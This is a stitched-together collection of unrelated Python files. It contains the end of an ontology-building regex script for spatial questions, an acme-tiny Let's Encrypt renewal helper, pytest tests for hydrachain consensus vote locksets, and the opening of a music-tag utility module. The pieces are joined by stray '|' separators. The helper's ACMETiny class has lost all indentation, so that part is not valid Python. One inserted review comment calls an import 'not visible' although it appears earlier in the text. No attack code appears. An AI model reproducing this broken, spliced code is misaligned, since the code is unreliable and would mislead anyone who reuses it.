                                    # [SC] extract and save to a file individual adjective words from the phrase
                                    subResults = subMatcher.findall(intentResult.group('adjective'))
                                    for adjCount in range(len(subResults)):
                                        if subResults[adjCount] not in nonobjects:
                                            adjwriter.writerow({
                                                'intent': intentResult.group('intent')
                                                , 'adjective': subResults[adjCount]
                                                , 'distance': len(subResults) - adjCount
                                                , 'qid': q['ID']
                                            })
                                            # [SC] create Adjective individual for the ontology
                                            adjStr = prulars_to_singular(subResults[adjCount])
                                            adjIndiv = onto.Adjective(f"a-{adjStr}")
                                            adjIndiv.label = adjStr
                                            # [SC] connect Intent and Adjective
                                            intentIndiv.modifiedBy.append(adjIndiv)
                                            # [SC] connect IntentPhrase and Adjective
                                            intentPhraseIndiv.hasWord.append(adjIndiv)
                                extentResult = extentMatcher.search(intentResult.group('rightside'))
                                if extentResult:
                                    extentwriter.writerow({
                                        'relation': extentResult.group('relation').strip()
                                        , 'extent': extentResult.group('extent').strip()
                                        , 'qid': q['ID']
                                    })
                                    if extentResult.group('objectphrase'):
                                        simpleObjResult = simpleObjMatcher.search(extentResult.group('objectphrase'))
                                        # [SC] write to file the entire object phrase at first
                                        objwriter.writerow({
                                            'intent': intentResult.group('intent')
                                            , 'relation': simpleObjResult.group('relation').replace(' ', '')
                                            , 'object': simpleObjResult.group('object')
                                            , 'distance': 0
                                            , 'qid': q['ID']
                                        })
                                        # [SC] create IntentPhrase individual for the ontology
                                        objPhraseIndiv = onto.ObjectPhrase(f"{corpusNS}-{q['ID']}-{simpleObjResult.group('relation')}{simpleObjResult.group('object')}")
                                        objPhraseIndiv.label = f"{simpleObjResult.group('relation')}{simpleObjResult.group('object')}"
                                        # [SC] connect IntentPhrase and ObjectPhrase
                                        intentPhraseIndiv.before.append(objPhraseIndiv)
                                        # [SC] connect ObjectPhrase and Question
                                        questionIndiv.hasPhrase.append(objPhraseIndiv)
                                        # [SC] create ObjectRelation individual
                                        objRelationIndiv = onto.ObjectRelation(simpleObjResult.group('relation').strip())
                                        objRelationIndiv.label = simpleObjResult.group('relation').strip()
                                        # [SC] connect ObjectPhrase and ObjectRelation
                                        objPhraseIndiv.hasRelation.append(objRelationIndiv)
                                        # [SC] connect Intent and ObjectRelation
                                        intentIndiv.followedBy.append(objRelationIndiv)
                                        objIndiv = None
                                        # [SC] extract and save to a file individual object words from the phrase
                                        subResults = subMatcher.findall(simpleObjResult.group('object'))
                                        # Iterate from the last word backwards: the head noun
                                        # (distance 1) becomes the Object; earlier words are
                                        # treated as its adjectives.
                                        for objectCount in reversed(range(len(subResults))):
                                            if subResults[objectCount] not in nonobjects:
                                                objwriter.writerow({
                                                    'intent': intentResult.group('intent')
                                                    , 'relation': simpleObjResult.group('relation').replace(' ', '')
                                                    , 'object': subResults[objectCount]
                                                    , 'distance': len(subResults) - objectCount
                                                    , 'qid': q['ID']
                                                })
                                                if (len(subResults) - objectCount == 1):
                                                    # [SC] create Object individual
                                                    objStr = prulars_to_singular(subResults[objectCount])
                                                    objIndiv = onto.Object(f"o-{objStr}")
                                                    objIndiv.label = objStr
                                                    # [SC] connect ObjectPhrase and Object
                                                    objPhraseIndiv.hasObject.append(objIndiv)
                                                    # [SC] connect ObjectRelation and Object
                                                    objIndiv.precededBy.append(objRelationIndiv)
                                                    # [SC] connect Intent and Object
                                                    intentIndiv.targets.append(objIndiv)
                                                else:
                                                    # NOTE(review): if the last word is in
                                                    # `nonobjects`, objIndiv stays None here and
                                                    # this append would raise -- confirm inputs.
                                                    # [SC] create Adjective individual for the ontology
                                                    adjStr = prulars_to_singular(subResults[objectCount])
                                                    adjIndiv = onto.Adjective(f"a-{adjStr}")
                                                    adjIndiv.label = adjStr
                                                    # [SC] connect Object and Adjective
                                                    objIndiv.modifiedBy.append(adjIndiv)
                                                    # [SC] connect ObjectPhrase and Adjective
                                                    objPhraseIndiv.hasWord.append(adjIndiv)
                                qidStr += f"{q['ID']},"
                                counter += 1
                        # Summary: how many questions matched, and their ids.
                        print(counter)
                        print(qidStr)
if __name__ == '__main__':
    # [SC] folder with input corpora
    corporaDir = "inputCorpora"
    # [SC] data output folder
    dataOutputDir = "outputData"
    # [SC] load the ontology schema
    onto_path.append(corporaDir)
    onto = get_ontology("SpatialQuestionPatternOntology_schema.owl")
    onto.load()
    # Tokens that are never treated as object/adjective words.
    nonobjects = ('and', ',', '-', 'a', 'the', ')', '(')
    # Matches any run of non-whitespace characters (a "word").
    subExpress = "\S+"
    subMatcher = re.compile(subExpress, re.IGNORECASE)
    intentExpr = (
        "What "  # required wh start (case insensitive)
        + "(is|are|were|was|do|does|did|have|has|should|could|would|will) (be )?"  # required auxiliary
        + "(the |a )?"  # optional article
        + "(?P<adjective>(.*?))"  # lazy matching any zero or more chars
        + "(?P<intent>\S+)"  # any non-white space char
        + "(?P<rightside> (across|along|among|around|at|based on|based upon|between|by|for|from|given|if|in|inside|of|on|over|per|since|that|to|with|within) (.+))"
    )
    intentMatcher = re.compile(intentExpr, re.IGNORECASE)
    # Splits the right side of a question into an object phrase, a spatial
    # relation word, and the trailing extent (last relation wins via the
    # negative lookahead).
    extentExpr = (
        "(?P<objectphrase>.*?)"
        + "(?P<relation> (across|along|among|around|at|between|by|for|from|in|inside|of|on|per|to|within)) "
        + "(?P<extent>((?! (across|along|among|around|at|between|by|for|from|in|inside|of|on|per|to|within) ).)*)$"
    )
    extentMatcher = re.compile(extentExpr, re.IGNORECASE)
    simpleObjExp = (
        "(?P<relation>(across|along|among|around|at|based on|based upon|between|by|for|from|given|in|inside|of|on|over|per|since|that|to|with|within) )"
        + "("
        + "(?P<object>(.*?))"  # lazy matching any zero or more chars
        + "("
        + "(?= (across|along|among|around|at|between|by|for|from|given|if|in|inside|like|of|on|over|per|such|that|to|when|where|which|with|within) )"  # positive lookahead
        + "|$"
        + ")"
        + ")?"  # the entire pattern should occur 0 or 1 time
    )
    simpleObjMatcher = re.compile(simpleObjExp, re.IGNORECASE)
    with onto:
        # [SC] run analysis on the GeoAnQu corpus
        what_raw_questions()
        # [SC] run analysis on the MSMARCO corpus
        what_raw_questions("MSMARCO", "MSMARCO dataset", "msm")
        # [SC] run analysis on the GeoQuestions201 corpus
        #what_raw_questions("Geo201", "GeoQuestions201 dataset", "g201")
onto.save(f"{dataOutputDir}\\SpatialQuestionPatternOntology.owl") |
#!/usr/bin/env python3
import argparse
import glob
import hashlib
import logging
import OpenSSL
import os
import random
import requests
import sys
import textwrap
import time
import yaml
from datetime import datetime
# Module metadata (placeholders stripped by the dataset export).
__author__ = '<NAME>'
__copyright__ = 'Copyright 2017, <NAME>'
__credits__ = ['<NAME>']
__license__ = 'MIT'
__version__ = '1.0.0'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Production'
# Install logger part
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.StreamHandler())
LOGGER.setLevel(logging.INFO)
# Hardcoded acme-tiny repository
AT_GIT_URL = 'https://github.com/diafygi/acme-tiny.git'
class X509Parser():
    '''
    Module to parse certificate files
    '''
    def __init__(self, filename, validity_need=30, generate=False):
        self.filename = filename
        self.validity_need = validity_need
        self.generate = generate
        # NOTE(review): file handle is never explicitly closed.
        self.content = ''.join(open(self.filename).readlines())
        x509_cert = OpenSSL.crypto.load_certificate(
            OpenSSL.crypto.FILETYPE_PEM,
            self.content)
        # First subject component value (typically the CN) and expiry date.
        self.subject = x509_cert.get_subject().get_components()[0][1]
        self.not_after = x509_cert.get_notAfter()
        self.update_validity_in_days()
    def __str__(self):
        return 'subject: {}, not_after: {}: validity_in_days: {}'.format(
            self.subject,
            self.not_after,
            self.validity_in_days)
    def update_validity_in_days(self):
        """Compute how many days remain before the certificate expires."""
        try:
            # not_after is bytes like b'YYYYMMDDHHMMSSZ'; str() gives
            # "b'YYYYMMDD...'", so [2:10] extracts the YYYYMMDD part.
            as_timestamp = time.strptime(str(self.not_after)[2:10], '%Y%m%d')
            validity_limit = datetime.fromtimestamp(time.mktime(as_timestamp))
            now = datetime.utcnow()
            LOGGER.debug(validity_limit)
            difference = validity_limit-now
            self.validity_in_days = difference.days
        except TypeError:
            LOGGER.info("Can't parse {}".format(self.filename))
            LOGGER.info(self.not_after)
            raise
    def check_validity(self):
        """Return True when the certificate needs renewal (fewer days left
        than `validity_need`)."""
        return self.validity_in_days < self.validity_need
class CertificateManager():
    '''
    Orchestrates the certificate lifecycle: loads the YAML configuration,
    inspects existing certificates, then generates missing ones, regenerates
    expiring ones, and restarts the affected services (or merely reports,
    when `show` is set).
    '''
    def __init__(self, config_filename='/etc/acme-tiny/config.yaml',
                 dry_run=False, staging=False, show=False, validity_need=30,
                 generate=False):
        self.need_to_generate = []
        self.need_to_regenerate = []
        self.need_to_restart = []
        self.certificates = {}
        self.show = show
        self.validity_need = validity_need
        self.dry_run = dry_run
        self.staging = staging
        self.generate = generate
        self.load_config_file(config_filename)
        self.acme_tiny = ACMETiny(self.config['acme'],
                                  dry_run=self.dry_run,
                                  staging=self.staging)
        if self.dry_run:
            LOGGER.info('Run in dry mode')
        if self.show:
            LOGGER.info('Certificate(s) information:')
        self.load_certificates_config()
        self.parse_certificates()
        self.show_or_generate()
        self.show_or_regenerate()
    def load_config_file(self, config_filename):
        '''Read the main YAML config and expose its services/acme sections.'''
        # safe_load: yaml.load without an explicit Loader can construct
        # arbitrary Python objects from the file and is deprecated/unsafe.
        # `with` also guarantees the handle is closed.
        with open(config_filename) as stream:
            self.config = yaml.safe_load(stream)
        self.services = self.config['services']
        self.acme = self.config['acme']
    def load_certificates_config(self):
        '''Merge every per-certificate YAML file found under the configured
        certificates path into self.certificates (keyed by CN).'''
        self.certificates_path = self.config.get('certificates',
                                                 {}).get('path')
        # Guard: glob.glob(None) raises TypeError when the path is missing.
        if not self.certificates_path:
            return
        for certificate_path in glob.glob(self.certificates_path):
            with open(certificate_path) as stream:
                certificate = yaml.safe_load(stream)
            for key in certificate.keys():
                self.certificates[key] = certificate[key]
    def parse_certificates(self):
        '''Classify each configured CN: regenerate (exists but expiring soon,
        plus the services to restart) or generate (no certificate yet).'''
        for cn in self.certificates:
            cert_path = self.acme['cert_path'].format(cn)
            if os.path.isfile(cert_path):
                cert_info = X509Parser(cert_path,
                                       validity_need=self.validity_need,
                                       generate=self.generate)
                if self.show:
                    LOGGER.info(cert_info)
                if cert_info.check_validity():
                    services_to_restart = self.certificates[cn]['restart']
                    self.need_to_regenerate.append(cn)
                    for service in services_to_restart:
                        if service not in self.need_to_restart:
                            self.need_to_restart.append(service)
            else:
                self.need_to_generate.append(cn)
    def show_or_generate(self):
        '''Report (show mode) or bootstrap the certificates that are missing.'''
        if self.show:
            if len(self.need_to_generate) > 0:
                LOGGER.info('\nNeed to generate certificate(s):')
                LOGGER.info('\n'.join(self.need_to_generate))
        else:
            for certificate in self.need_to_generate:
                self.bootstrap(certificate)
    def show_or_regenerate(self):
        '''Report (show mode) or regenerate expiring certificates and restart
        the services that depend on them.'''
        if self.show:
            if len(self.need_to_regenerate) > 0:
                LOGGER.info('\nNeed to regenerate certificate(s):')
                LOGGER.info('\n'.join(self.need_to_regenerate))
                LOGGER.info('\nNeed to restart service(s) after regeneration:')
                LOGGER.info('\n'.join(self.need_to_restart))
        else:
            for certificate in self.need_to_regenerate:
                self.regenerate(certificate)
            for service in self.need_to_restart:
                self.restart(service)
    def restart(self, service):
        '''Run the configured restart command for a service (skipped in dry mode).'''
        cmd = self.services[service]
        LOGGER.info('Launch: {}'.format(cmd))
        if not self.dry_run:
            os.system(cmd)
    def bootstrap(self, certificate):
        '''Create the directory, private key, CSR and a self-signed cert/pem
        for a brand-new certificate, using the configured shell commands.
        Each artifact is only created when not already present.'''
        LOGGER.info('Generate {}'.format(certificate))
        key_filename = self.acme['priv_path'].format(certificate)
        csr_filename = self.acme['request_path'].format(certificate)
        crt_filename = self.acme['cert_path'].format(certificate)
        pem_filename = self.acme['chain_pem_path'].format(certificate)
        root_dir = os.path.dirname(key_filename)
        if not os.path.isdir(root_dir):
            LOGGER.info('Need to create {}'.format(root_dir))
            os.mkdir(root_dir, mode=0o750)
        if not os.path.isfile(key_filename):
            cmd = self.acme['cmd_priv_key'].format(key_filename)
            LOGGER.info(cmd)
            os.system(cmd)
        if not os.path.isfile(csr_filename):
            cmd = self.acme['cmd_csr'].format(key_filename, certificate,
                                              csr_filename)
            LOGGER.info(cmd)
            os.system(cmd)
        if not os.path.isfile(crt_filename):
            cmd = self.acme['cmd_self_sign'].format(csr_filename, crt_filename,
                                                    key_filename)
            LOGGER.info(cmd)
            os.system(cmd)
        if not os.path.isfile(pem_filename):
            cmd = self.acme['cmd_self_sign'].format(csr_filename, pem_filename,
                                                    key_filename)
            LOGGER.info(cmd)
            os.system(cmd)
    def regenerate(self, certificate):
        '''Request a fresh signed certificate through acme-tiny.'''
        LOGGER.info('Regenerate {}'.format(certificate))
        self.acme_tiny.sign_certificate(certificate)
class ACMETiny():
def __init__(self, config, dry_run=False, staging=False):
self.config = config
self.install_or_update()
acme_path = self.config['tiny_path']
if acme_path not in sys.path:
sys.path.append(acme_path)
import acme_tiny
self.dry_run = dry_run
self.staging = staging
self.acme_tiny = acme_tiny
self.check_ca()
if self.dry_run or self.staging:
LOGGER.info('!!!Use LE staging!!!')
self.ca = 'https://acme-staging.api.letsencrypt.org'
else:
self.ca = acme_tiny.DEFAULT_CA
def install_or_update(self):
acme_path = self.config['tiny_path']
if os.path.isdir(acme_path):
cmd = 'cd {} ; git pull'.format(acme_path)
LOGGER.debug(cmd)
os.system(cmd)
else:
LOGGER.debug('Need to create {}'.format(acme_path))
root_dir = os.path.dirname(acme_path)
LOGGER.debug('Git clone in {}'.format(root_dir))
cmd = 'cd {} ; git clone --depth 1 {}'.format(root_dir, AT_GIT_URL)
LOGGER.debug(cmd)
os.system(cmd)
cron_path = self.config['cron_filename']
if not os.path.isfile(cron_path):
LOGGER.info('Need to create {}'.format(cron_path))
cron = '{} {} * * * root '
cron += '/usr/local/acme_helper/acme_helper.py '
cron += '>> /var/log/acme_tiny.log 2>&1\n'
cron = cron.format(
random.randrange(0, 59),
random.randrange(0, 23)
)
LOGGER.info(cron)
with open(cron_path, 'w') as stream:
stream.write(cron)
def check_ca(self):
existing_ca = False
need_to_update_ca = False
if os.path.isfile(self.config['intermediate_certs']):
existing_ca = True
fhash = hashlib.sha1()
fhash.update(''.join(
open(self.config['intermediate_certs']).readlines()).encode())
else:
LOGGER.info('Need to download')
need_to_update_ca = True
r = requests.get(self.config['intermediate_url'])
intermediate_ca_content = r.text
self.ca_content = intermediate_ca_content
# Downloaded hash
dhash = hashlib.sha1()
dhash.update(intermediate_ca_content.encode())
if existing_ca:
size_match = fhash.digest_size == dhash.digest_size
hex_match = fhash.hexdigest() == dhash.hexdigest()
if size_match and hex_match:
need_to_update_ca = False
else:
need_to_update_ca = True
if need_to_update_ca:
LOGGER.info('Update {}'.format(self.config['intermediate_certs']))
if not self.dry_run:
with open(self.config['intermediate_certs'], 'w') as stream:
stream.write(intermediate_ca_content)
def sign_certificate(self, certificate):
    """Sign the CSR for *certificate* via acme_tiny and write results.

    Writes the signed certificate and the cert+intermediate chain PEM
    to the configured paths (skipped in dry-run mode). Relies on
    ``self.ca_content`` having been populated by ``check_ca()``.
    """
    csr_filename = self.config['request_path'].format(certificate)
    crt_filename = self.config['cert_path'].format(certificate)
    chain_pem_filename = self.config['chain_pem_path'].format(certificate)
    # NOTE(review): the config key is spelled 'chalenge_path' (missing
    # an 'l') everywhere this code reads it -- keep config files in sync.
    signed_crt = self.acme_tiny.get_crt(self.config['key'],
                                        csr_filename,
                                        self.config['chalenge_path'],
                                        log=LOGGER,
                                        CA=self.ca)
    if not self.dry_run:
        with open(crt_filename, 'w') as stream:
            stream.write(signed_crt)
        with open(chain_pem_filename, 'w') as stream:
            stream.write(signed_crt+self.ca_content)
def main(argv):
    """Command-line entry point: parse options and run one pass of the
    certificate manager.

    Args:
        argv: list of command-line arguments (without the program name).
    """
    help_text = '''\
This script automates the let's encrypt certificates with:
https://github.com/diafygi/acme-tiny
'''
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=textwrap.dedent(help_text)
    )
    parser.add_argument('--quiet', action='store_const', const=logging.ERROR,
                        help='suppress output except for errors')
    parser.add_argument('--dry', action='store_const', const=True,
                        help='Launch in dry mode (in staging LE environnement)'
                        )
    parser.add_argument('--generate', action='store_const', const=True,
                        help='Generate missing certificate'
                        )
    # BUG FIX: const was True, so LOGGER.setLevel() received the integer
    # 1 instead of a real logging level; use logging.DEBUG.
    parser.add_argument('--debug', action='store_const', const=logging.DEBUG,
                        help='Launch in debug mode'
                        )
    parser.add_argument('--show', action='store_const', const=True,
                        help='Only show certificate informations'
                        )
    parser.add_argument('--staging', action='store_const', const=True,
                        help='Use LE staging (for tests)'
                        )
    # type=int so a malformed value fails at parse time, not later
    parser.add_argument('--day', type=int, default=30,
                        help='Certificate validity days before regenerate them'
                        )
    args = parser.parse_args(argv)
    # --quiet wins over --debug when both are given (unchanged behavior)
    LOGGER.setLevel(args.quiet or args.debug or LOGGER.level)
    # NOTE(review): assumes `from datetime import datetime` at module
    # top (not visible in this chunk) -- confirm.
    LOGGER.info('==== Started at {}'.format(datetime.utcnow()))
    CertificateManager(dry_run=args.dry, validity_need=int(args.day),
                       show=args.show, staging=args.staging,
                       generate=args.generate)
    LOGGER.info('==== Finished at {}'.format(datetime.utcnow()))
# Script entry point.
if __name__ == '__main__':  # pragma: no cover
    main(sys.argv[1:])
|
<gh_stars>100-1000
# from hydrachain import protocol
from hydrachain.consensus.base import Vote, VoteBlock, VoteNil, LockSet, ishash, Ready
from hydrachain.consensus.base import DoubleVotingError, InvalidVoteError, MissingSignatureError
from hydrachain.consensus.base import BlockProposal, genesis_signing_lockset, InvalidProposalError
from hydrachain.consensus.base import Proposal, VotingInstruction, InvalidSignature, Signed
from ethereum import utils, tester
import rlp
import pytest
# Deterministic dummy 32-byte private key shared by the tests below.
privkey = 'x' * 32
def test_signed():
    """Hash and sender of a Signed object must not depend on the signature."""
    sig = Signed(v=0, r=0, s=0)
    assert sig.sender is None
    # hashing before signing must fail
    with pytest.raises(MissingSignatureError):
        sig.hash
    sig.sign(privkey)
    sender_before = sig.sender
    hash_before = sig.hash
    sig.v = 0  # tamper with the signature; hash/sender must be unaffected
    assert sig.sender == sender_before
    assert sig.hash == hash_before
def test_vote():
    """Votes round-trip through rlp, keep their subtype, and hash by content."""
    h, r = 2, 3
    bh = '0' * 32
    sender = utils.privtoaddr(privkey)

    # a missing blockhash constructs a VoteNil, a non-empty one a VoteBlock
    v = Vote(h, r)
    v2 = Vote(h, r, blockhash=bh)
    assert isinstance(v, Vote)
    assert isinstance(v2, Vote)
    assert isinstance(v, VoteNil)
    assert isinstance(v, rlp.Serializable)
    assert isinstance(v2, VoteBlock)

    # signing recovers the expected sender address
    v.sign(privkey)
    s = v.sender
    assert s == sender
    v2.sign(privkey)
    assert v2.sender == sender

    # encode / decode round trip preserves subtype and equality
    assert len(v.get_sedes()) == len(v.fields) == 6
    vs = rlp.encode(v)
    assert isinstance(vs, bytes)
    print rlp.decode(vs)  # Python 2 print statement; leftover debug output
    vd = rlp.decode(vs, Vote)
    assert isinstance(vd, VoteNil)
    assert vd.blockhash == ''
    assert vd == v
    v2s = rlp.encode(v2)
    v2d = rlp.decode(v2s, Vote)
    assert isinstance(v2d, VoteBlock)
    assert v2d.blockhash == bh
    assert v2d == v2
    assert v != v2
    assert vd != v2d

    # equal votes collapse in sets (hash consistent with ==)
    assert len(set((v, vd))) == 1
    assert len(set((v2, v2d))) == 1
    assert len(set((v, vd, v2, v2d))) == 2
# Ten deterministic validator keypairs (Python 2: chr() yields byte strings).
privkeys = [chr(i) * 32 for i in range(1, 11)]
validators = [utils.privtoaddr(p) for p in privkeys]
def test_ready():
    """Ready messages compare equal iff their height/round fields match."""
    lockset = LockSet(num_eligible_votes=len(privkeys))
    ready_a = Ready(0, current_lockset=lockset)
    assert ready_a.current_lockset == lockset
    ready_a.sign(privkey)
    # a second message with the same fields is equal once signed
    ready_b = Ready(0, current_lockset=lockset)
    ready_b.sign(privkey)
    # a different first field breaks equality
    ready_c = Ready(1, current_lockset=lockset)
    ready_c.sign(privkey)
    assert ready_a == ready_b
    assert ready_a != ready_c
def test_LockSet():
    """LockSet.add(): unsigned votes rejected, duplicates idempotent,
    wrong rounds rejected, and double voting raises."""
    ls = LockSet(num_eligible_votes=len(privkeys))
    assert not ls
    assert len(ls) == 0
    bh = '0' * 32
    r, h = 2, 3
    v1 = VoteBlock(h, r, bh)

    # adding an unsigned vote must fail
    with pytest.raises(InvalidVoteError):
        ls.add(v1)
    assert not ls
    assert v1 not in ls

    # add signed
    v1.sign(privkeys[0])
    ls.add(v1)
    assert ls
    assert len(ls) == 1

    # re-adding the same vote is a no-op (hash unchanged)
    lsh = ls.hash
    ls.add(v1)
    assert lsh == ls.hash
    assert len(ls) == 1

    # second identical vote from the same sender is also a no-op
    v2 = VoteBlock(h, r, bh)
    v2.sign(privkeys[0])
    ls.add(v1)
    ls.add(v2)
    assert lsh == ls.hash
    assert len(ls) == 1

    # a vote from a different sender changes the lockset
    v3 = VoteBlock(h, r, bh)
    v3.sign(privkeys[1])
    ls.add(v1)
    ls.add(v3)
    assert lsh != ls.hash
    assert len(ls) == 2
    assert v3 in ls
    lsh = ls.hash

    # a vote for the wrong round is rejected
    v4 = VoteBlock(h, r + 1, bh)
    v4.sign(privkeys[2])
    with pytest.raises(InvalidVoteError):
        ls.add(v4)
    assert lsh == ls.hash
    assert len(ls) == 2
    assert v4 not in ls

    # the same sender voting for a different blockhash is double voting
    v3_2 = VoteBlock(h, r, blockhash='1' * 32)
    v3_2.sign(privkeys[1])
    with pytest.raises(DoubleVotingError):
        ls.add(v3_2)
    assert lsh == ls.hash
    assert len(ls) == 2
    assert v3_2 not in ls
def test_one_vote_lockset():
    """A single vote is already a quorum when only one vote is eligible."""
    lockset = LockSet(num_eligible_votes=1)
    blockhash = '0' * 32
    vote = VoteBlock(3, 2, blockhash)  # height=3, round=2
    vote.sign(privkeys[0])
    lockset.add(vote)
    assert lockset.has_quorum
def test_LockSet_isvalid():
    """A lockset becomes valid once >= 2/3 of eligible votes are in;
    identical blockhashes then also form a quorum."""
    ls = LockSet(num_eligible_votes=len(privkeys))
    bh = '0' * 32
    r, h = 2, 3
    votes = [VoteBlock(h, r, bh) for i in range(len(privkeys))]
    for i, v in enumerate(votes):
        v.sign(privkeys[i])
        ls.add(v)
        assert len(ls) == i + 1
        if len(ls) < ls.num_eligible_votes * 2 / 3.:
            assert not ls.is_valid
        else:
            assert ls.is_valid
            assert ls.has_quorum  # same blockhash
            ls.check()
def test_LockSet_3_quorums():
    """With 3 eligible votes, 1 block vote + 2 nil votes form a no-quorum
    (not a quorum and not even a possible quorum)."""
    ls = LockSet(3)
    v = VoteBlock(0, 0, '0' * 32)
    v.sign(privkeys[0])
    ls.add(v)
    v = VoteNil(0, 0)
    v.sign(privkeys[1])
    ls.add(v)
    # two of three votes: not yet valid
    assert len(ls) == 2
    assert not ls.is_valid
    v = VoteNil(0, 0)
    v.sign(privkeys[2])
    ls.add(v)
    assert ls.is_valid
    assert ls.has_noquorum
    assert not ls.has_quorum
    assert not ls.has_quorum_possible
    assert ls.check()
def test_LockSet_quorums():
    """Exhaustive quorum / no-quorum / quorum-possible vote patterns.

    Each pattern lists one entry per voter: an int selects a blockhash
    (chr(int) * 32); None casts a nil vote. The named LockSet property
    must hold for the resulting lockset.
    """
    combinations = dict(has_quorum=[
        [1] * 7,
        [1] * 7 + [2] * 3,
        [1] * 7 + [None] * 3,
    ],
        has_noquorum=[
            [1] * 3 + [2] * 3 + [None],
            [None] * 7,
            [None] * 10,
            range(10),
            range(7)
        ],
        has_quorum_possible=[
            [1] * 4 + [None] * 3,
            [1] * 4 + [2] * 4,
            [1] * 4 + [2] * 3 + [3] * 3,
            [1] * 6 + [2]
        ])

    r, h = 1, 2
    for method, permutations in combinations.items():
        for set_ in permutations:
            assert len(set_) >= 7
            ls = LockSet(len(privkeys))
            for i, p in enumerate(set_):
                if p is not None:
                    bh = chr(p) * 32
                    v = VoteBlock(h, r, bh)
                else:
                    v = VoteNil(h, r)
                v.sign(privkeys[i])
                ls.add(v)
            assert len(ls) >= 7
            assert getattr(ls, method)
            ls.check()

            # check stable sort of blockhashes()
            bhs = ls.blockhashes()
            if len(bhs) > 1:
                assert ishash(bhs[0][0])
                assert isinstance(bhs[0][1], int)
                if bhs[0][1] == bhs[1][1]:
                    # equal vote counts: ordered by blockhash, descending
                    assert bhs[0][0] > bhs[1][0]
                else:
                    # otherwise ordered by vote count, descending
                    assert bhs[0][1] > bhs[1][1]

            # serialization round trip preserves equality and the property
            s = rlp.encode(ls)
            d = rlp.decode(s, LockSet)
            assert ls == d
            assert id(ls) != id(d)
            assert getattr(ls, method) == getattr(d, method)
def test_blockproposal():
    """BlockProposal construction, signing, vote validation and rlp
    round trip, including the round>0 round_lockset requirements."""
    s = tester.state()

    # block 1: proposal signed over the genesis signing lockset
    s.mine(n=1)
    genesis = s.blocks[0]
    assert genesis.header.number == 0
    blk1 = s.blocks[1]
    assert blk1.header.number == 1
    gls = genesis_signing_lockset(genesis, privkeys[0])
    bp = BlockProposal(height=1, round=0, block=blk1, signing_lockset=gls, round_lockset=None)
    assert bp.lockset == gls
    assert isinstance(bp, Proposal)
    bp.sign(tester.k0)

    with pytest.raises(InvalidProposalError):  # round >0 needs round_lockset
        bp = BlockProposal(height=1, round=1, block=blk1, signing_lockset=gls, round_lockset=None)
    bp.validate_votes(validators, validators[:1])

    # block 2: needs a full signing lockset over block 1
    s.mine(n=1)
    blk2 = s.blocks[2]
    assert blk2.header.number == 2
    ls = LockSet(len(validators))
    for privkey in privkeys:
        v = VoteBlock(height=1, round=0, blockhash=blk1.hash)
        v.sign(privkey)
        ls.add(v)
    bp = BlockProposal(height=2, round=0, block=blk2, signing_lockset=ls, round_lockset=None)
    assert bp.lockset == ls
    with pytest.raises(InvalidProposalError):  # signature missing
        bp.validate_votes(validators, validators)
    with pytest.raises(InvalidProposalError):
        bp.sign(privkeys[0])  # privkey doesnt match coinbase
        bp.validate_votes(validators, validators)
    with pytest.raises(InvalidSignature):  # already signed
        bp.sign(tester.k0)
    bp.v = 0  # reset sigcheck hack
    bp.sign(tester.k0)
    bp.validate_votes(validators, validators)

    with pytest.raises(InvalidProposalError):  # round >0 needs round_lockset
        bp = BlockProposal(height=2, round=1, block=blk2, signing_lockset=gls, round_lockset=None)

    # block 2 round 1, timeout in round=0: a nil round lockset is required
    rls = LockSet(len(validators))
    for privkey in privkeys:
        v = VoteNil(height=2, round=0)
        v.sign(privkey)
        rls.add(v)
    bp = BlockProposal(height=2, round=1, block=blk2, signing_lockset=ls, round_lockset=rls)
    assert bp.lockset == rls
    bp.sign(tester.k0)
    bp.validate_votes(validators, validators)

    # serialize round trip keeps the block and stays valid
    s = rlp.encode(bp)
    dbp = rlp.decode(s, BlockProposal)
    assert dbp.block == blk2
    dbp.validate_votes(validators, validators)

    # a quorum-possible (not no-quorum) round lockset must be rejected
    rls = LockSet(len(validators))
    for i, privkey in enumerate(privkeys):
        if i < 4:
            v = VoteBlock(height=2, round=0, blockhash='0' * 32)
        else:
            v = VoteNil(height=2, round=0)
        v.sign(privkey)
        rls.add(v)
    assert not rls.has_noquorum
    assert rls.has_quorum_possible
    with pytest.raises(InvalidProposalError):  # NoQuorum necessary R0
        bp = BlockProposal(height=2, round=1, block=blk2, signing_lockset=ls, round_lockset=rls)
def test_VotingInstruction():
    """A VotingInstruction needs a quorum-possible round lockset; a
    no-quorum lockset must raise InvalidProposalError.

    BUG FIX: the original test repeated the entire no-quorum section
    verbatim a second time (copy-paste duplicate); the duplicate added
    no coverage and has been removed.
    """
    # quorum possible: 4 of 10 vote for the same blockhash
    rls = LockSet(len(validators))
    bh = '1' * 32
    for i, privkey in enumerate(privkeys):
        if i < 4:  # quorum possible
            v = VoteBlock(height=2, round=0, blockhash=bh)
        else:
            v = VoteNil(height=2, round=0)
        v.sign(privkey)
        rls.add(v)
    assert rls.has_quorum_possible
    bp = VotingInstruction(height=2, round=1, round_lockset=rls)
    bp.sign(privkeys[0])
    assert bh == bp.blockhash

    # noquorum: only 3 votes for the blockhash -> construction must fail
    rls = LockSet(len(validators))
    for i, privkey in enumerate(privkeys):
        if i < 3:  # noquorum
            v = VoteBlock(height=2, round=0, blockhash=bh)
        else:
            v = VoteNil(height=2, round=0)
        v.sign(privkey)
        rls.add(v)
    assert not rls.has_quorum_possible
    assert rls.has_noquorum
    with pytest.raises(InvalidProposalError):  # quorum-possible necessary in R0
        bp = VotingInstruction(height=2, round=1, round_lockset=rls)
|
<filename>clamm/util.py
""" utils
"""
import os
import sys
import time
import inspect
import subprocess
import colorama
from clamm import config
# Regex of separators used to split a combined artist string into
# individual artist names ("A & B", "A feat. B", "A and B", ...).
# BUG FIX: made this a raw string -- '\s' in a normal string literal is
# an invalid escape sequence (SyntaxWarning on modern Python); the value
# is unchanged.
SPLIT_REGEX = r'&\s*|,\s*|;\s*| - |:\s*|/\s*| feat. | and '
# Tag field names that may carry artist information.
ARTIST_TAG_NAMES = ["ALBUMARTIST_CREDIT",
                    "ALBUM ARTIST",
                    "ARTIST",
                    "ARTIST_CREDIT",
                    "ALBUMARTIST"]
SEC_PER_DAY = 60*60*24  # seconds in a day
def commit_to_libfile(tagfile):
    """Write changed values from the tag database into an audio file.

    Args:
        tagfile: object exposing ``tags`` (current values), ``tag_copy``
            (previous values) and ``save()``.

    Returns:
        tuple: ``(n_tracks_updated, n_delta_fields)``.
    """
    # check if differences (or newness) exist
